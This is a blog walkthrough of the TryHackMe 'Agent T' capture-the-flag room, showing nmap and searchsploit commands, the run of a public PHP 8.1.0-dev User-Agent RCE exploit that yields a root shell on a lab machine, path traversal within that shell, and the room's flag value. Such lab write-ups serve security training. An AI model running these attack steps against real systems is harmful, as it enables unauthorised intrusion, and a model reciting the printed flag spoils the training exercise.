In this walk through, we will be going through the Agent T room from Tryhackme. This room is rated as Easy on the platform and consist exploitation of a PHP server using a known exploit to get the required flag. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Agent T VM |
IPaddress | 10.10.55.180 |
Difficulty | Easy |
Objective | Agent T uncovered this website, which looks innocent enough, but something seems off about how the server responds… |
Enumeration:
- I first started with a all ports scan using the timing template of 4 and found only port 80 opened. Then i issued another scan to detect service version of the running webserver and found out that it is using PHP server with a PHP version 8.1.0-dev. Pretty interesting.
sudo nmap -sS -p- -T4 10.10.55.180
nmap -sV -p 80 10.10.55.180
- Found nothing worth in the application running on port 80. It is more of a rabbit hole and i too fell in it and wasted a lot of time.
- Next, i searched for any known exploits and got a User Agent RCE exploit. Bingo!
searchsploit PHP 8.1.0
Initial Access:
- Used the exploit from Exploit DB and fired it on our target which gives me a root shell. Nothing better than that.
wh1terose@fsociety:~/CTF/TryHackme/AgentT$ python3 49933.py Enter the full host url: http://10.10.55.180 Interactive shell is opened on http://10.10.55.180 Can't acces tty; job crontol turned off. $ id uid=0(root) gid=0(root) groups=0(root)
Getting the Flag:
- The shell we have here has some restrictions as it did not let me to move freely around the filesystem and constrained me within the current directory. I overcome this limitation by exploiting directory traversal in the shell and read the contents of the flag file.
$ ls ../../../../../../../ bin boot dev etc flag.txt home -- snipped -- $ cat ../../../../../../../flag.txt flag{4127d0530abf16d6d23973e3df8dbecb} $
Task 1 – Find The Flag
Question 1 – What is the flag?
flag{4127d0530abf16d6d23973e3df8dbecb}
Also Read: Tryhackme – Windows PrivEsc Arena
Conclusion:
So that was “Agent T” for you. We first started with a nmap scan and found port 80 opened with a PHP web server running specifically PHP version 8.1.0-dev. Enumerated the website running on port 80 and found nothing useful. So, searched for the known exploits for the PHP server version using searchsploit and got a hit for a User Agent RCE exploit. Used it to get root access on the system and captured the flag. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.